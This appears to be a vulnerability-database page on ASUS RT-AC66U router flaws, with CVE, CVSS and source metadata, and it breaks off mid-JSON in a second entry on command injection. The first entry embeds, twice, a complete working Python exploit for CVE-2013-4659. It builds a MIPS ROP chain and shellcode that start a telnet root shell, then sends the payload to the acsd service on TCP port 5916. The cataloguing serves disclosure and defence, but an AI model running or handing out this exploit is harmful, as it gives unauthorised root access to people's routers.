Vulnerabilites related to asus - rt-ac66u
var-201703-0032
Vulnerability from variot
Buffer overflow in Broadcom ACSD allows remote attackers to execute arbitrary code via a long string to TCP port 5916. This component is used on routers of multiple vendors including ASUS RT-AC66U and TRENDnet TEW-812DRU. The ASUS RT-AC66U is a dual-band wireless router. ASUS RT-AC66U Broadcom acsd Wireless Channel Service (Wireless Channel Servic) has multiple buffer overflow vulnerabilities that allow remote attackers to exploit a vulnerability to submit a malicious request to stop the device from responding or possibly execute arbitrary code. ASUS RT-AC66U is prone to multiple buffer-overflow vulnerabilities. Failed exploit attempts will likely result in denial-of-service conditions. The former is produced by ASUS, and the latter is produced by TRENDnet in the United States. Broadcom ACSD is one of the wireless channel service components. A buffer overflow vulnerability exists in the Broadcom ACSD component used in the ASUS RT-AC66U and TRENDnet TEW-812DRU. #!/usr/bin/env python
import signal, struct from time import sleep from socket import * from sys import exit, exc_info
Title***ASUS RT-AC66U Remote Root Shell Exploit - acsd param command
Discovered and Reported*June 2013
Discovered/Exploited By*Jacob Holcomb/Gimppy and Jacob Thompson
*Security Analsyts @ Independent Security Evaluators
Software Vendor***http://asus.com
Exploit/Advisory**http://securityevaluators.com, http://infosec42.blogspot.com/
Software****acsd wireless service (Listens on TCP/5916)
Firmware Version**3.0.0.4.266 (Other versions were not tested and may be vulnerable)
CVE***ASUS RT-AC66U Multiple Buffer Overflows: CVE-2013-4659
Overview:
The ASUS RT-AC66U contains the Broadcom ACSD Wireless binary that is vulnerable to multiple
Buffer Overflow attacks.
Multiple overflows exist in the following software:
- Broadcom acsd - Wireless Channel Service (autochannel¶m, autochannel&data, csscan&ifname commands)
def sigHandle(signum, frm): # Signal handler
print "\n[!!!] Cleaning up the exploit... [!!!]\n"
sleep(1)
exit(0)
def targServer():
while True:
try:
server = inet_aton(raw_input("\n[*] Please enter the IPv4 address of the ASUS RT-AC66U router:\n\n>"))
server = inet_ntoa(server)
break
except:
print "\n\n[!!!] Error: Please enter a valid IPv4 address. [!!!]\n\n"
sleep(1)
continue
return server
def main():
print ("""\n [*] Title: ASUS RT-AC66U Remote Root Shell Exploit - acsd param command
[] Discovered and Reported: June 2013 [] Discovered/Exploited By: Jacob Holcomb/Gimppy and Jacob Thompson, Security Analysts @ ISE [] Software Vendor: http://asus.com [] Exploit/Advisory: http://securityevaluators.com, http://infosec42.blogspot.com/ [] Software: acsd wireless service (Listens on TCP/5916) [] Firmware Version: 3.0.0.4.266 (Other versions were not tested and may be vulnerable) [*] CVE: ASUS RT-AC66U Broadcom ACSD Buffer Overflow: CVE-2013-4659\n""") signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c victim = targServer() port = int(5916) acsdCmd = "autochannel¶m=" #Vulnerable command - JH
# base address of .text section of libc.so.0 in acsd's address space
libc_base = 0x2ab25000
# ROP gadget #1
# lui s0,0x2
# li a0,1
# move t9,s1
# jalr t9
# ori a1,s0,0x2
ra1 = struct.pack("<L", libc_base + 0x2d39c)
# ROP gadget #2
# move t9,s3
# lw ra,44(sp)
# lw s4,40(sp)
# lw s3,36(sp)
# lw s2,32(sp)
# lw s1,28(sp)
# lw s0,24(sp)
# jr t9
s1 = struct.pack("<L", libc_base + 0x34358)
# sleep() - used to force program context switch (cache flush)
s3 = struct.pack("<L", libc_base + 0x2cb90)
# ROP gadget #3
# addiu a1,sp,24
# lw gp,16(sp)
# lw ra,32(sp)
# jr ra
# addiu sp,sp,40
ra2 = struct.pack("<L", libc_base + 0xa1b0)
# ROP gadget #4
# move t9,a1
# addiu a0,a0,56
# jr t9
# move a1,a2
ra3 = struct.pack("<L", libc_base + 0x3167c)
# jalr sp
jalr_sp = "\x09\xf8\xa0\x03"
JuNk = "\x42" * 510
safeNop = "2Aa3"
#80 Bytes system() Shellcode by Jacob Holcomb of ISE
#Calling system() and executing telnetd -l /bin/sh
shellcode = "\x6c\x6e\x08\x3c\x74\x65\x08\x35\xec\xff\xa8"
shellcode += "\xaf\x64\x20\x09\x3c\x65\x74\x29\x35\xf0\xff"
shellcode += "\xa9\xaf\x20\x2f\x0a\x3c\x2d\x6c\x4a\x35\xf4"
shellcode += "\xff\xaa\xaf\x6e\x2f\x0b\x3c\x62\x69\x6b\x35"
shellcode += "\xf8\xff\xab\xaf\x73\x68\x0c\x24\xfc\xff\xac"
shellcode += "\xaf\xec\xff\xa4\x23\xec\xff\xbd\x23\xb4\x2a"
shellcode += "\x19\x3c\x50\xf0\x39\x37\x09\xf8\x20\x03\x32"
shellcode += "\x41\x61\x33"
sploit = acsdCmd + JuNk + s1 + JuNk[0:4] + s3 + ra1 + JuNk[0:48]
sploit += ra2 + JuNk[0:24]+ jalr_sp + safeNop + ra3 + JuNk[0:4]
sploit += safeNop + shellcode
try:
print "\n [*] Creating network socket."
net_sock = socket(AF_INET, SOCK_STREAM)
except:
print "\n [!!!] There was an error creating the network socket. [!!!]\n\n%s\n" % exc_info()
sleep(1)
exit(0)
try:
print " [*] Connecting to ASUS RT-AC66U router @ %s on port TCP/%d." % (victim, port)
net_sock.connect((victim, port))
except:
print "\n [!!!] There was an error connecting to %s. [!!!]\n\n%s\n" % (victim, exc_info())
sleep(1)
exit(0)
try:
print """ [*] Attempting to exploit the acsd param command.
[] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d. [] Payload Length: %d bytes.""" % (victim, port, len(sploit)) net_sock.send(sploit) sleep(1) except: print "\n [!!!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!!!]\n\n%s\n" % (victim, exc_info()) sleep(1) exit(0)
try:
print """ [*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution!
[*] Closing network socket. Press ctrl + c repeatedly to force exploit cleanup.\n""" net_sock.close() except: print "\n [!!!] There was an error closing the network socket. [!!!]\n\n%s\n" % exc_info() sleep(1) exit(0)
if name == "main": main()
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "rt-ac66u", "scope": "eq", "trust": 1.6, "vendor": "asus", "version": null }, { "_id": null, "model": "tew-812dru", "scope": "eq", "trust": 1.0, "vendor": "trendnet", "version": null }, { "_id": null, "model": "rt-ac66u", "scope": null, "trust": 0.8, "vendor": "asustek computer", "version": null }, { "_id": null, "model": "tew-812dru", "scope": null, "trust": 0.8, "vendor": "trendnet", "version": null }, { "_id": null, "model": "rt-ac66u", "scope": "eq", "trust": 0.6, "vendor": "asus", "version": "3.0.0.4.266" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-11043" }, { "db": "JVNDB", "id": "JVNDB-2013-006764" }, { "db": "CNNVD", "id": "CNNVD-201307-627" }, { "db": "NVD", "id": "CVE-2013-4659" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/o:asus:rt-ac66u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:trendnet:tew-812dru_firmware", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-006764" } ] }, "credits": { "_id": null, "data": "Jacob Holcomb/Gimppy and Jacob Thompson", "sources": [ { "db": "BID", "id": "61499" }, { "db": "CNNVD", "id": "CNNVD-201307-627" } ], "trust": 0.9 }, "cve": "CVE-2013-4659", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CVE-2013-4659", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.9, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2013-11043", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "VHN-64661", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2013-4659", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2013-4659", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2013-4659", "trust": 0.8, "value": "Critical" }, { "author": "CNVD", "id": "CNVD-2013-11043", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201307-627", "trust": 0.6, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-64661", "trust": 0.1, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2013-4659", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-11043" }, { "db": "VULHUB", "id": "VHN-64661" }, { "db": "VULMON", "id": "CVE-2013-4659" }, { "db": "JVNDB", "id": "JVNDB-2013-006764" }, { "db": "CNNVD", "id": "CNNVD-201307-627" }, { "db": "NVD", "id": "CVE-2013-4659" } ] }, "description": { "_id": null, "data": "Buffer overflow in Broadcom ACSD allows remote attackers to execute arbitrary code via a long string to TCP port 5916. This component is used on routers of multiple vendors including ASUS RT-AC66U and TRENDnet TEW-812DRU. The ASUS RT-AC66U is a dual-band wireless router. ASUS RT-AC66U Broadcom acsd Wireless Channel Service (Wireless Channel Servic) has multiple buffer overflow vulnerabilities that allow remote attackers to exploit a vulnerability to submit a malicious request to stop the device from responding or possibly execute arbitrary code. ASUS RT-AC66U is prone to multiple buffer-overflow vulnerabilities. Failed exploit attempts will likely result in denial-of-service conditions. The former is produced by ASUS, and the latter is produced by TRENDnet in the United States. Broadcom ACSD is one of the wireless channel service components. A buffer overflow vulnerability exists in the Broadcom ACSD component used in the ASUS RT-AC66U and TRENDnet TEW-812DRU. #!/usr/bin/env python\n\nimport signal, struct\nfrom time import sleep\nfrom socket import *\nfrom sys import exit, exc_info\n\n#\n# Title*******************ASUS RT-AC66U Remote Root Shell Exploit - acsd param command\n# Discovered and Reported*June 2013 \n# Discovered/Exploited By*Jacob Holcomb/Gimppy and Jacob Thompson\n# *Security Analsyts @ Independent Security Evaluators\n# Software Vendor*********http://asus.com\n# Exploit/Advisory********http://securityevaluators.com, http://infosec42.blogspot.com/\n# Software****************acsd wireless service (Listens on TCP/5916)\n# Firmware Version********3.0.0.4.266 (Other versions were not tested and may be vulnerable) \n# CVE*********************ASUS RT-AC66U Multiple Buffer Overflows: CVE-2013-4659\n#\n# Overview:\n#\tThe ASUS RT-AC66U contains the Broadcom ACSD Wireless binary that is vulnerable to multiple \n# Buffer Overflow attacks. \n#\n# Multiple overflows exist in the following software:\n#\n#\t- Broadcom acsd - Wireless Channel Service (autochannel\u0026param, autochannel\u0026data, csscan\u0026ifname commands)\n#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\n\ndef sigHandle(signum, frm): # Signal handler\n \n print \"\\n[!!!] Cleaning up the exploit... [!!!]\\n\"\n sleep(1)\n exit(0)\n\n\ndef targServer():\n \n while True: \n try:\n server = inet_aton(raw_input(\"\\n[*] Please enter the IPv4 address of the ASUS RT-AC66U router:\\n\\n\u003e\"))\n server = inet_ntoa(server)\n break\n except:\n print \"\\n\\n[!!!] Error: Please enter a valid IPv4 address. [!!!]\\n\\n\"\n sleep(1)\n continue\n \n return server \n\n\ndef main():\n \n print (\"\"\"\\n [*] Title: ASUS RT-AC66U Remote Root Shell Exploit - acsd param command\n [*] Discovered and Reported: June 2013\n [*] Discovered/Exploited By: Jacob Holcomb/Gimppy and Jacob Thompson, Security Analysts @ ISE\n [*] Software Vendor: http://asus.com\n [*] Exploit/Advisory: http://securityevaluators.com, http://infosec42.blogspot.com/\n [*] Software: acsd wireless service (Listens on TCP/5916)\n [*] Firmware Version: 3.0.0.4.266 (Other versions were not tested and may be vulnerable)\n [*] CVE: ASUS RT-AC66U Broadcom ACSD Buffer Overflow: CVE-2013-4659\\n\"\"\")\n signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c\n victim = targServer()\n port = int(5916)\n acsdCmd = \"autochannel\u0026param=\" #Vulnerable command - JH\n \n # base address of .text section of libc.so.0 in acsd\u0027s address space\n libc_base = 0x2ab25000\n\n # ROP gadget #1\n # lui s0,0x2\n # li a0,1\n # move t9,s1\n # jalr t9\n # ori a1,s0,0x2\n ra1 = struct.pack(\"\u003cL\", libc_base + 0x2d39c)\n\n # ROP gadget #2\n # move t9,s3\n # lw ra,44(sp)\n # lw s4,40(sp)\n # lw s3,36(sp)\n # lw s2,32(sp)\n # lw s1,28(sp)\n # lw s0,24(sp)\n # jr t9\n s1 = struct.pack(\"\u003cL\", libc_base + 0x34358)\n\n # sleep() - used to force program context switch (cache flush)\n s3 = struct.pack(\"\u003cL\", libc_base + 0x2cb90)\n\n # ROP gadget #3\n # addiu a1,sp,24\n # lw gp,16(sp)\n # lw ra,32(sp)\n # jr ra\n # addiu sp,sp,40\n ra2 = struct.pack(\"\u003cL\", libc_base + 0xa1b0)\n\n # ROP gadget #4\n # move t9,a1\n # addiu a0,a0,56\n # jr t9\n # move a1,a2\n ra3 = struct.pack(\"\u003cL\", libc_base + 0x3167c)\n\n # jalr sp\n jalr_sp = \"\\x09\\xf8\\xa0\\x03\"\n \n JuNk = \"\\x42\" * 510\n safeNop = \"2Aa3\"\n\n #80 Bytes system() Shellcode by Jacob Holcomb of ISE\n #Calling system() and executing telnetd -l /bin/sh\n shellcode = \"\\x6c\\x6e\\x08\\x3c\\x74\\x65\\x08\\x35\\xec\\xff\\xa8\"\n shellcode += \"\\xaf\\x64\\x20\\x09\\x3c\\x65\\x74\\x29\\x35\\xf0\\xff\"\n shellcode += \"\\xa9\\xaf\\x20\\x2f\\x0a\\x3c\\x2d\\x6c\\x4a\\x35\\xf4\"\n shellcode += \"\\xff\\xaa\\xaf\\x6e\\x2f\\x0b\\x3c\\x62\\x69\\x6b\\x35\"\n shellcode += \"\\xf8\\xff\\xab\\xaf\\x73\\x68\\x0c\\x24\\xfc\\xff\\xac\"\n shellcode += \"\\xaf\\xec\\xff\\xa4\\x23\\xec\\xff\\xbd\\x23\\xb4\\x2a\"\n shellcode += \"\\x19\\x3c\\x50\\xf0\\x39\\x37\\x09\\xf8\\x20\\x03\\x32\"\n shellcode += \"\\x41\\x61\\x33\"\n\n sploit = acsdCmd + JuNk + s1 + JuNk[0:4] + s3 + ra1 + JuNk[0:48]\n sploit += ra2 + JuNk[0:24]+ jalr_sp + safeNop + ra3 + JuNk[0:4]\n sploit += safeNop + shellcode\n\n try:\n print \"\\n [*] Creating network socket.\"\n net_sock = socket(AF_INET, SOCK_STREAM)\n except:\n print \"\\n [!!!] There was an error creating the network socket. [!!!]\\n\\n%s\\n\" % exc_info() \n sleep(1)\n exit(0) \n\n try:\n print \" [*] Connecting to ASUS RT-AC66U router @ %s on port TCP/%d.\" % (victim, port)\n net_sock.connect((victim, port))\n except:\n print \"\\n [!!!] There was an error connecting to %s. [!!!]\\n\\n%s\\n\" % (victim, exc_info())\n sleep(1)\n exit(0)\n \n try:\n print \"\"\" [*] Attempting to exploit the acsd param command. \n [*] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d. \n [*] Payload Length: %d bytes.\"\"\" % (victim, port, len(sploit))\n net_sock.send(sploit)\n sleep(1)\n except:\n print \"\\n [!!!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!!!]\\n\\n%s\\n\" % (victim, exc_info())\n sleep(1)\n exit(0)\n\n try:\n print \"\"\" [*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution!\n [*] Closing network socket. Press ctrl + c repeatedly to force exploit cleanup.\\n\"\"\"\n net_sock.close()\n except:\n print \"\\n [!!!] There was an error closing the network socket. [!!!]\\n\\n%s\\n\" % exc_info()\n sleep(1)\n exit(0)\n\n\nif __name__ == \"__main__\":\n main()\n", "sources": [ { "db": "NVD", "id": "CVE-2013-4659" }, { "db": "JVNDB", "id": "JVNDB-2013-006764" }, { "db": "CNVD", "id": "CNVD-2013-11043" }, { "db": "BID", "id": "61499" }, { "db": "VULHUB", "id": "VHN-64661" }, { "db": "VULMON", "id": "CVE-2013-4659" }, { "db": "PACKETSTORM", "id": "122562" } ], "trust": 2.7 }, "exploit_availability": { "_id": null, "data": [ { "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=27133", "trust": 0.2, "type": "exploit" }, { "reference": "https://www.scap.org.cn/vuln/vhn-64661", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-64661" }, { "db": "VULMON", "id": "CVE-2013-4659" } ] }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2013-4659", "trust": 3.6 }, { "db": "PACKETSTORM", "id": "122562", "trust": 2.7 }, { "db": "BID", "id": "61499", "trust": 1.6 }, { "db": "JVNDB", "id": "JVNDB-2013-006764", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201307-627", "trust": 0.7 }, { "db": "CNVD", "id": "CNVD-2013-11043", "trust": 0.6 }, { "db": "NSFOCUS", "id": "24219", "trust": 0.6 }, { "db": "EXPLOIT-DB", "id": "27133", "trust": 0.2 }, { "db": "SEEBUG", "id": "SSVID-80751", "trust": 0.1 }, { "db": "SEEBUG", "id": "SSVID-80752", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-64661", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2013-4659", "trust": 0.1 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-11043" }, { "db": "VULHUB", "id": "VHN-64661" }, { "db": "VULMON", "id": "CVE-2013-4659" }, { "db": "BID", "id": "61499" }, { "db": "JVNDB", "id": "JVNDB-2013-006764" }, { "db": "PACKETSTORM", "id": "122562" }, { "db": "CNNVD", "id": "CNNVD-201307-627" }, { "db": "NVD", "id": "CVE-2013-4659" } ] }, "id": "VAR-201703-0032", "iot": { "_id": null, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2013-11043" }, { "db": "VULHUB", "id": "VHN-64661" } ], "trust": 1.1829994849999999 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-11043" } ] }, "last_update_date": "2024-11-23T22:01:14.484000Z", "patch": { "_id": null, "data": [ { "title": "Top Page", "trust": 0.8, "url": "https://www.asus.com/jp/" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.trendnet.com/home" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-006764" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-64661" }, { "db": "JVNDB", "id": "JVNDB-2013-006764" }, { "db": "NVD", "id": "CVE-2013-4659" } ] }, "references": { "_id": null, "data": [ { "trust": 2.6, "url": "http://www.linux-magazine.com/issues/2014/161/security-and-soho-routers" }, { "trust": 2.6, "url": "https://packetstormsecurity.com/files/122562/asus-rt-ac66u-acsd-remote-root-buffer-overflow.html" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-4659" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-4659" }, { "trust": 0.6, "url": "http://1337day.com/exploit/21033" }, { "trust": 0.6, "url": "http://www.securityfocus.com/bid/61499" }, { "trust": 0.6, "url": "http://www.nsfocus.net/vulndb/24219" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/119.html" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=33445" }, { "trust": 0.1, "url": "https://www.exploit-db.com/exploits/27133/" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "http://asus.com" }, { "trust": 0.1, "url": "http://securityevaluators.com," }, { "trust": 0.1, "url": "http://infosec42.blogspot.com/" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2013-11043" }, { "db": "VULHUB", "id": "VHN-64661" }, { "db": "VULMON", "id": "CVE-2013-4659" }, { "db": "JVNDB", "id": "JVNDB-2013-006764" }, { "db": "PACKETSTORM", "id": "122562" }, { "db": "CNNVD", "id": "CNNVD-201307-627" }, { "db": "NVD", "id": "CVE-2013-4659" } ] }, "sources": { "_id": null, "data": [ { "db": "CNVD", "id": "CNVD-2013-11043", "ident": null }, { "db": "VULHUB", "id": "VHN-64661", "ident": null }, { "db": "VULMON", "id": "CVE-2013-4659", "ident": null }, { "db": "BID", "id": "61499", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2013-006764", "ident": null }, { "db": "PACKETSTORM", "id": "122562", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201307-627", "ident": null }, { "db": "NVD", "id": "CVE-2013-4659", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2013-08-01T00:00:00", "db": "CNVD", "id": "CNVD-2013-11043", "ident": null }, { "date": "2017-03-14T00:00:00", "db": "VULHUB", "id": "VHN-64661", "ident": null }, { "date": "2017-03-14T00:00:00", "db": "VULMON", "id": "CVE-2013-4659", "ident": null }, { "date": "2013-07-29T00:00:00", "db": "BID", "id": "61499", "ident": null }, { "date": "2017-04-05T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-006764", "ident": null }, { "date": "2013-07-26T20:22:22", "db": "PACKETSTORM", "id": "122562", "ident": null }, { "date": "2013-07-29T00:00:00", "db": "CNNVD", "id": "CNNVD-201307-627", "ident": null }, { "date": "2017-03-14T09:59:00.160000", "db": "NVD", "id": "CVE-2013-4659", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2013-08-01T00:00:00", "db": "CNVD", "id": "CNVD-2013-11043", "ident": null }, { "date": "2017-03-15T00:00:00", "db": "VULHUB", "id": "VHN-64661", "ident": null }, { "date": "2017-03-15T00:00:00", "db": "VULMON", "id": "CVE-2013-4659", "ident": null }, { "date": "2013-07-31T12:25:00", "db": "BID", "id": "61499", "ident": null }, { "date": "2017-04-05T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-006764", "ident": null }, { "date": "2017-03-15T00:00:00", "db": "CNNVD", "id": "CNNVD-201307-627", "ident": null }, { "date": "2024-11-21T01:56:00.523000", "db": "NVD", "id": "CVE-2013-4659", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "122562" }, { "db": "CNNVD", "id": "CNNVD-201307-627" } ], "trust": 0.7 }, "title": { "_id": null, "data": "ASUS RT-AC66U and TRENDnet TEW-812DRU Used by multiple vendor routers including Broadcom ACSD Vulnerable to buffer overflow", "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-006764" } ], "trust": 0.8 }, "type": { "_id": null, "data": "buffer overflow", "sources": [ { "db": "CNNVD", "id": "CNNVD-201307-627" } ], "trust": 0.6 } }
var-201804-1341
Vulnerability from variot
Main_Analysis_Content.asp in /apply.cgi on ASUS RT-AC66U, RT-AC68U, RT-AC86U, RT-AC88U, RT-AC1900, RT-AC2900, and RT-AC3100 devices before 3.0.0.4.384_10007; RT-N18U devices before 3.0.0.4.382.39935; RT-AC87U and RT-AC3200 devices before 3.0.0.4.382.50010; and RT-AC5300 devices before 3.0.0.4.384.20287 allows OS command injection via the pingCNT and destIP fields of the SystemCmd variable. plural ASUS The product includes OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ASUS RT-AC66U, etc. are all wireless router products of ASUS. Attackers can use the percent and desktOP fields of the System Cmd variable to inject this vulnerability and execute operating system commands with higher authority. The following products and versions are affected: ASUS RT-AC66U; RT-AC68U; RT-AC86U; RT-AC88U; RT-AC1900; .382.39935 prior; RT-AC87U and RT-AC3200 prior to 3.0.0.4.382.50010; RT-AC5300 prior to 3.0.0.4.384.20287
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201804-1341", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "rt-n18u", "scope": "lt", "trust": 1.6, "vendor": "asus", "version": "3.0.0.4.382.39935" }, { "model": "rt-ac87u", "scope": "lt", "trust": 1.6, "vendor": "asus", "version": "3.0.0.4.382.50010" }, { "model": "rt-ac3200", "scope": "lt", "trust": 1.6, "vendor": "asus", "version": "3.0.0.4.382.50010" }, { "model": "rt-ac5300", "scope": "lt", "trust": 1.6, "vendor": "asus", "version": "3.0.0.4.384.20287" }, { "model": "rt-ac86u", "scope": "lt", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.384.10007" }, { "model": "rt-ac68u", "scope": "lt", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.384.10007" }, { "model": "rt-ac2900", "scope": "lt", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.384.10007" }, { "model": "rt-ac3100", "scope": "lt", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.384.10007" }, { "model": "rt-ac88u", "scope": "lt", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.384.10007" }, { "model": "rt-ac1900", "scope": "lt", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.384.10007" }, { "model": "rt-ac66u", "scope": "lt", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.384.10007" }, { "model": "rt-ac1900", "scope": null, "trust": 0.8, "vendor": "asustek computer", "version": null }, { "model": "rt-ac2900", "scope": null, "trust": 0.8, "vendor": "asustek computer", "version": null }, { "model": "rt-ac3100", "scope": null, "trust": 0.8, "vendor": "asustek computer", "version": null }, { "model": "rt-ac3200", "scope": null, "trust": 0.8, "vendor": "asustek computer", "version": null }, { "model": "rt-ac5300", "scope": null, "trust": 0.8, "vendor": "asustek computer", "version": null }, { "model": "rt-ac66u", "scope": null, "trust": 0.8, "vendor": "asustek computer", "version": null }, { "model": "rt-ac68u", "scope": null, "trust": 0.8, "vendor": "asustek computer", "version": null }, { "model": "rt-ac86u", "scope": null, "trust": 0.8, "vendor": "asustek computer", "version": null }, { "model": "rt-ac87u", "scope": null, "trust": 0.8, "vendor": "asustek computer", "version": null }, { "model": "rt-ac88u", "scope": null, "trust": 0.8, "vendor": "asustek computer", "version": null }, { "model": "rt-n18u", "scope": null, "trust": 0.8, "vendor": "asustek computer", "version": null }, { "model": "rt-ac68u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac66u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac88u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac86u", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac1900", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac2900", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac3100 \u003c3.0.0.4.384 10007", "scope": null, "trust": 0.6, "vendor": "asus", "version": null }, { "model": "rt-ac66u", "scope": "eq", "trust": 0.6, "vendor": "asus", "version": "3.0.0.4.246" }, { "model": "rt-ac66u", "scope": "eq", "trust": 0.6, "vendor": "asus", "version": "3.0.0.4.354" }, { "model": "rt-ac66u", "scope": "eq", "trust": 0.6, "vendor": "asus", "version": "3.0.0.4.260" }, { "model": 